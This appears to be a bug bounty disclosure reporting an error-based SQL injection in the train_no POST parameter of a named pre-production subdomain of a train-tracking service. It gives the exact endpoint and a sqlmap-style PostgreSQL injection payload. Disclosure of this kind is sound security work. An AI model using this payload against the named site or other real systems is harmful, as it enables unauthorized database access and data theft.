Summary: Sql Injection (parameter train_no) on subdomain (pre-prod.whereismytrain.in)
Steps to reproduce:
Visit the link
https://pre-prod.whereismytrain.in/mt/submit_change_in_status
which is the fourth on the list which is affected
The parameter is train_no is injectable with Error-Type Postgresql
Detail of the injection to further test or reproduce is
Parameter: train_no (POST)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: train_no=' AND 5178=CAST((CHR(113)||CHR(113)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5178=5178) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) AND 'PdSo'='PdSo&train_date=
Browser/OS: Chrome/Firefox
Attack scenario:
This subdomain can be reached by a good recon and the directories have to be brute-forced. The application and the owner straightaway looses first two pillars of CIA triad. By letting the application go vulnerable as well as attacker getting a chance to be handy with data.
Acquisition info:
It was acquired in the 2k18 end acc to Crunchbase